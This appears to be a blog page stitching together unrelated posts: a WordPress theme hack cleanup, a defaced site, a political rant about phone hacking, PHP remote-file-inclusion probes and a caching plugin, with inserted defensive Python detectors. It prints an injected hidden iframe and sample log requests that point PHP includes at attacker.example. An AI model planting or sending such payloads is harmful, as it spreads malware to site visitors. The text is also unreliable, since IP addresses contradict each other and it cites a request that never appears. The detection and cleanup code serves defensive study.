A few days ago I got hacked. I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.
This, I assumed, could not actually be happening, as I'd put the blockers on the whole of Vietnam using .htaccess! The reason for this is that initially, tructuyenso wasn't the only site appearing in the progress tip; there was another which lasted until I got rid of the various files dumped on my website. This is how (with the Order line and the closing tag that the block needs):
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from 126.96.36.199/8
</Limit>
A few caveats on that block. Apache's default is Order Deny,Allow, under which an "allow from all" is evaluated last and overrides the deny, so without the Order line the rule blocks nothing. <Limit GET POST> only restricts those two methods (HEAD counts as GET) and leaves the others, such as OPTIONS, untouched; for an unconditional block, leave the <Limit> wrapper out. A /8 mask covers the whole first octet of that address, far more than one hosting company's range. Most importantly, a deny rule on my server only stops requests coming from those addresses to me; it does nothing about a visitor's browser fetching content from Vietnam when one of my own pages tells it to, which, as it turned out, was exactly what was going on.
However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….
A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager. (In the end, this was my failing and I will not rely on the thing again!)
A search through my database also turned up zero.
TCPView is a download from Sysinternals.com (now Microsoft!) that lists every network connection open on one's PC, in both directions, with the remote address and the process that owns it. This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) was opened in Firefox, as many as 7 connections were made simultaneously to 188.8.131.52. This is the IP address that hosts tructuyenso.vn plus 11 other domains, some of which I'd seen flash through the progress bar.
Even when closed in TCPView, the connections would immediately start up again to the same IP address, 184.108.40.206 (closing the strangelyperfect.tv tab stopped them).
I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a website malware & blacklist scan (Sucuri) was the killer! On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Strictly, the malware itself was hosted in Vietnam; what my site was doing was telling every visitor's browser to go and fetch it, which is exactly what a scanner should flag, and which explains the slowness of the site to load as the browser tried and failed to download shite my way from Vietnam.)
Checking the source code for my homepage (which in retrospect I should have done first!!) threw up "tructuyenso.vn" right at the very bottom: a spam link plus a zero-by-zero iframe that silently loads the whole of that site into every page. This is the code as it was when I checked:
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
This was then easily traced to the footer.php file in my theme, Suffusion.
It was simply stripped out and the website then worked fine..... but to be sure, I downloaded a fresh copy of the theme and checked its footer file against mine; the fresh one is clean. I then uploaded the whole clean Suffusion theme in its entirety, in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
A recheck on Sucuri shows my website to be okay now. See screendump below. I'll be using Sucuri a lot more!
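The two checks that would have shortened this hunt, as an added example (not code from the original post, the Suffusion theme or WordPress): a scan for zero-size or hidden iframes that pull content from another host, which is what the file manager search above failed to find in footer.php, and a comparison of the installed theme directory against a fresh download of the same theme, which is the manual check described above done by hash. Every file and HTML fragment in the block is constructed for the demo; the only real name in it is the injected domain quoted from the page.

```python
"""Added example, not code from the original post or from the Suffusion theme.
Two checks for a compromised WordPress theme: find_hidden_iframes() flags
zero-size or hidden <iframe> elements whose src is another host, like the one
found in footer.php above, and diff_against_clean() compares an installed
theme directory with a fresh download of the same theme, reporting files that
differ or were added. Every file and HTML fragment below is constructed for
the demo; the only real name used is the injected domain from the post."""
import hashlib
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # valueless attributes such as `nosize` arrive as (name, None)
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_zero_or_hidden(attrs):
    """True for 0/1 pixel frames or frames hidden with inline CSS."""
    tiny = {"0", "0px", "1", "1px"}
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width", "").strip() in tiny
            or attrs.get("height", "").strip() in tiny
            or "display:none" in style
            or "visibility:hidden" in style)


def find_hidden_iframes(html, own_host):
    """Return the src of every hidden iframe that pulls content from off-site.
    A relative src has no hostname and is treated as our own host."""
    collector = _IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or own_host
        if host != own_host and _is_zero_or_hidden(attrs):
            hits.append(src)
    return hits


def _sha256_tree(root):
    """Map relative path -> SHA-256 of content for every file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_against_clean(installed, clean):
    """Return (modified, added): files whose content differs from the clean
    copy, and files present in the installed theme but not in the clean one."""
    inst, ref = _sha256_tree(installed), _sha256_tree(clean)
    modified = sorted(f for f in inst if f in ref and inst[f] != ref[f])
    added = sorted(f for f in inst if f not in ref)
    return modified, added


# Constructed footer.php contents: a clean footer, and the same file with the
# link and zero-size iframe quoted in the post appended to it.
CLEAN_FOOTER = "<div id='footer'>&copy; 2009</div>\n</body></html>\n"
INJECTED_FOOTER = CLEAN_FOOTER + (
    '<a href="http://tructuyenso.vn" title="Quang cao truc tuyen">Quang cao truc tuyen</a>\n'
    '<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" '
    'bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize '
    'scrolling="no" src="http://tructuyenso.vn/"></iframe>\n'
)


def demo():
    """Build a clean and an infected copy of a tiny theme on disk, diff them,
    then scan only the files that changed for hidden off-site iframes."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean")
        installed = os.path.join(tmp, "installed")
        for root, footer in ((clean, CLEAN_FOOTER), (installed, INJECTED_FOOTER)):
            os.makedirs(root)
            for name in ("header.php", "index.php"):
                with open(os.path.join(root, name), "w") as fh:
                    fh.write("<?php get_template_part('loop'); ?>\n")
            with open(os.path.join(root, "footer.php"), "w") as fh:
                fh.write(footer)
        # a file the attacker dropped, which a fresh theme download does not contain
        with open(os.path.join(installed, "wp-cache.php"), "w") as fh:
            fh.write("<?php /* constructed stand-in for a dropped file */ ?>\n")
        modified, added = diff_against_clean(installed, clean)
        iframes = []
        for rel in modified:
            with open(os.path.join(installed, rel), encoding="utf-8") as fh:
                iframes += find_hidden_iframes(fh.read(), "strangelyperfect.tv")
        return modified, added, iframes


if __name__ == "__main__":
    print(demo())  # (['footer.php'], ['wp-cache.php'], ['http://tructuyenso.vn/'])
```

Point diff_against_clean() at the live wp-content/themes/<theme> directory and at an unpacked fresh download of the same version; anything in "added" is something the theme author never shipped, and anything in "modified" is worth reading line by line before it is replaced.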
I got an auto-alert from a Scamraiders post by Justin Asking that a page on one of the plethora of Willms self-promotional websites has been tampered with, and sure enough it has! See here for the original comment from Justin Asking.
Below is a screenshot of the hacked page, a brief perusal of the rest of the site shows no other tamperings…. Still. It made me laugh, although having had this website and the Crawling Chaos website hacked by Turks, I know that personally, it’s not a lot of fun. (I wonder if Willms will post about it and how long it’ll take to fix it…Probably got a lot on his plate, currently!)
Now, as soon as this happened, I thought “who has most to gain from the sinking of this protest ship?”
I immediately said, "The French" to my partner. It's in their interest to get that pesky ship out of their test zone.
Many years passed until finally some French secret service agents were collared for the dastardly deed. President Mitterrand, it turns out, authorised the bombing and thus the death of the Portuguese-born Dutch photographer, Fernando Pereira.
The news this week is that the sleaze-paper, News of the World (NOTW), part of the nationality-challenged Rupert Murdoch’s empire, hacked many prominent people’s phones in order to gather information. (News of the World ‘bugging’ claim – Wednesday 8th)
Later, the news was that there was going to be a huge investigation by the police into the allegations. (Police to probe phone hack claims – Thursday 9th). In fact, PM Brown said, “This raises questions that are serious and will obviously have to be answered.”
A few hours later, and the massive investigation was finished! (New phone hack inquiry ruled out – Thursday 9th) Second top Met cop John Yates said, "No additional evidence has come to light since this case has concluded. I therefore consider that no further investigation is required." He also said, "This investigation has not uncovered any evidence to suggest that John Prescott's phone had been tapped."
Warning: sarcasm alert! I think it's amazing that Yates & Co. have managed to sift through all of this evidence in less than half a day! It's fantastic! If only all enquiries were this fast! Arms to Iraq! Iraq War! Cash for Questions! G20 Tomlinson death and kettling tactics! You know, things would be so much better.
Who Has Most to Gain?
Rupert Murdoch - will he gain?
Going back to my Rainbow Warrior experience, this is the thought that now crosses my mind. In situations like this, forget the morals and any issues of integrity, personal or national, that arise. Just look at the question in its starkness. Who has most to gain?
Well this question really has several parts, or vantage points, if you like, that all supply an answer to the above question.
Obviously, The Guardian now gains from extra publicity, their oxygen of business.
NOTW originally gained by getting stories, the same oxygen of their business.
This is the relevant chunk, showing the information source as Richard Thomas, recently retired Information Commissioner, and quoted verbatim from Preston's blog. Thomas did a huge investigation into this trade in personal information, the results of which were presented to our Parliament, our representatives, in 2007. This is the chunk below (remember, see if you can spot the key bit!!):
Richard Thomas, 'a champion of civil liberties'. Photo: Michael Stephens/ PA
A good deal of this trade in personal confidential information has already been exposed by Richard Thomas, who has just retired as information commissioner.
In a series of reports and in evidence to the House of Commons culture, media and sport committee, he made a series of disclosures about newspaper activities that he regarded as “prima facie” illegal.
Here’s a statement from him to MPs that he gave in March 2007, which refers to the results of an investigation he carried out into the business relationship between the press and a firm of private investigators (the investigation was given the codename Operation Motorman):
“The first thing I would need to share is that the 3,000 or 4,000 transactions identified… came from a total of 13,000 transactions in this one operation alone. We were careful only to put forward those where there was some sort of hard evidence of the transaction being positively identified as involving a journalist for a newspaper”.
And this is what he cited as the evidence of payments being made by journalists for the information:
“We did have, and we do have still, the statements, the bank statements, the invoices – some of these well-known proprietors were including information such as ‘payment for confidential information’, payment for ‘blagging’ [obtaining information by deception] in some cases – so there was what I might call hard ‘prima facie’ evidence.”
However the degree of detail obtained by him about this trade was startling.
Where did the money end up? Well, a flow-chart produced by the office of the information commissioner shows the press employing private detectives who in turn deal with phone companies, call centres, the DVLA and what’s described as “police source”.
Did you spot the last bit of the sentence? I’ll paraphrase now for emphasis…
Where did the money (paid for hacked information) end up? The information commissioner shows the press employing private detectives who deal with (…) a “police source“.
And there we have it!
Now we know why Yates' "investigation" finished so quickly. The former Information Commissioner tells us, in words presented to Parliament: to protect the police!
Just remember, this current government has ramped up the "fear factor" over terrorism so much that the police and other services have unparalleled access to all sorts of electronic information. In fact, by law, telecoms companies are required to keep it....
In this week’s events we’ve seen the Police investigate an event of which they were one of the prime information sources (according to Thomas) and declared “no case to answer”. They are investigator, judge, jury and imprisoner.
As I’ve predicted many times in these pages, (and I’m only using history as a guide here, remember – I’m not a fortune teller), when the police are given unbridled power, that power will be abused either by an individual or the organisation as a whole.
The police now have power of arrest for virtually anything – e.g. by law, I’m not allowed to take their photo! I can be arrested and searched without reason and imprisoned for the same reasons indefinitely. Just look. It’s all there, all passed in the last few years.
But if this case and previous ones are anything to go by, it appears that if an “investigator” can’t get the information they want, they pay the police for it!
What have we got here – the Rockford Files!
And afterwards, the Police say “no case”. “Case closed”. “No further information”.
Our chickens have come home to roost, and no-one’s noticing!
Actually, someone’s noticing.
Director of Public Prosecutions Keir Starmer launches 'urgent' review of phone tap inquiry Photo: PA
The police have decided to do nothing because, as they say, no NEW information has come to light (this is now being misquoted as "There is no information that John Prescott's phone was tapped" instead of "There is no NEW information that John Prescott's phone was tapped", which is a different thing altogether, and those saying it know it!)
And calls for the police to do the right thing and investigate properly are mounting.
I watch with anticipation from my little tank. I’ve a feeling, and I hope, that this one will run and run and that hopefully, some proper rein will be put on our law enforcement folk. Unlike most people, I don’t consider this a press freedom issue – I consider it a key part of all our freedoms.
As you can see, SERVER[DOCUMENT ROOT] is PHP's $_SERVER['DOCUMENT_ROOT'] variable, the one a script uses to find where the site's files live, and the request tries to overwrite it from the query string so that it points at http://web.archive.org/web/20130611185214/http://www.foxreality.com/ which is part of Rupert Murdoch's empire. That trick only works on a PHP install with register_globals switched on, where a script doing include($_SERVER['DOCUMENT_ROOT'] . '/something.php') would then fetch and run code from that remote site instead of from my own disk.
NOD32 NAC Trojan
The hyperlinks above don't work as the injected code failed. However, if you are brave, strip out the first bit and just go to as I did, and hopefully your anti-virus or browser will kick in with a malware warning like mine did! The malware is identified by my NOD32 anti-virus software as a trojan: PHP/Small.NAC.
Someone has dumped a piece of malware on a Fox network site and is now going round blogs and other websites firing requests designed to make them include and run it, and thus spread the nefarious package. It just needs one site that accepts the remote path, or one visitor who clicks through!
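A way to spot these probes in the web server log rather than waiting for the anti-virus, as an added example that is not code from the original post: it pulls the query string out of each request, flags any parameter whose name would land in a PHP superglobal (the _SERVER[DOCUMENT_ROOT]= form seen above) and any parameter whose value is a remote URL, which is the general shape of a remote file inclusion probe, and counts them per source address. The Apache combined-format log lines are constructed for the demo, using documentation-range IPs and placeholder hostnames; the register_globals mechanism it assumes is the standard one behind this class of attack.

```python
"""Added example, not code from the original post. A small detector for the
kind of request described above: a query-string parameter that tries to
overwrite a PHP superglobal such as $_SERVER['DOCUMENT_ROOT'] and/or carries
a remote URL as its value, so that a script doing
include($_SERVER['DOCUMENT_ROOT'] . '/x.php') on a register_globals=On host
would fetch code from elsewhere. The Apache combined-format log lines are
constructed for the demo, with documentation-range IPs and placeholder
hostnames."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# ip ident user [timestamp] "method target protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# parameter names that, with register_globals on, would land in a PHP superglobal
GLOBAL_OVERRIDE = re.compile(r'^_?(SERVER|GLOBALS|ENV|GET|POST|COOKIE|REQUEST)\[', re.IGNORECASE)
# stream schemes PHP's include() can open when allow_url_include is on
REMOTE_URL = re.compile(r'^(https?|ftp|php|data)://', re.IGNORECASE)


def classify_request(target):
    """Return [(param, value, reason), ...] for suspicious query parameters
    in a request target such as '/index.php?x=http://evil/shell.txt?'."""
    query = urlsplit(target).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        reasons = []
        if REMOTE_URL.match(value.strip()):
            reasons.append("remote URL as parameter value")
        if GLOBAL_OVERRIDE.match(name):
            reasons.append("overwrites a PHP superglobal")
        if reasons:
            findings.append((name, value, "; ".join(reasons)))
    return findings


def scan_log(lines):
    """Return [(ip, target, findings)] for every parseable line carrying a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


def probes_per_ip(lines):
    """Count probing requests by source address: the 'nine in a few minutes' view."""
    return dict(Counter(ip for ip, _target, _findings in scan_log(lines)))


# Constructed sample log: two RFI-style probes from one address, ordinary traffic from another.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jun/2009:10:51:43 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://attacker.example/shell.txt? HTTP/1.1" 200 5123',
    '198.51.100.9 - - [13/Jun/2009:10:51:50 +0000] "GET /?s=phone+hacking HTTP/1.1" 200 8870',
    '203.0.113.7 - - [13/Jun/2009:10:51:58 +0000] "GET /wp-content/themes/suffusion/footer.php?page=http://attacker.example/id.txt?? HTTP/1.1" 404 312',
    '198.51.100.9 - - [13/Jun/2009:10:52:05 +0000] "GET /2009/06/hacked/?page_id=42 HTTP/1.1" 200 9911',
    '203.0.113.7 - - [13/Jun/2009:10:52:30 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target)
        for name, value, reason in findings:
            print("   ", name, "=", value, "->", reason)
    print(probes_per_ip(SAMPLE_LOG))  # {'203.0.113.7': 2}
```

A 200 on the first line is not proof the include succeeded, only that index.php answered; the host-side fix is register_globals=Off and allow_url_include=Off in php.ini, after which the same requests are harmless and the log is just a list of addresses to block.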
As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I've found this Russian webpage where the trojan has been tested against various anti-virus programs: about half don't detect it, and the test dates from the end of May this year! See link, translated into English.
Following on from my previous little post about DB Cache, I’ve been using it since that time and it seems to be faster to me from little old Blighty. I use a USA based host so anything I see has to cross the pond anyway, but in a non-logged-in state, page loading is definitely faster than it was. WP Super Cache is now consigned to the test bed of history. Long live DB Cache, ha, ha.
Seriously, DB Cache is faster than no caching and Super Cache from my viewpoint, and in the end, that’s what counts. And BTW, my permalinks work fine now, Hurrah!
Paradoxically, since this time, my host has had quite a few drop-outs and web access has been lost intermittently. One time was due to the database server falling over, but the rest have been web server issues as far as I can tell. The mail server has worked okay even when the web server has been off, as has the customer service system server! I can't see how the DB Cache plugin could be doing this; it's just coincidence, I'm 99% sure. Anyway, I've politely told iXWebhosting that their chances are running out and they've been very apologetic etc etc.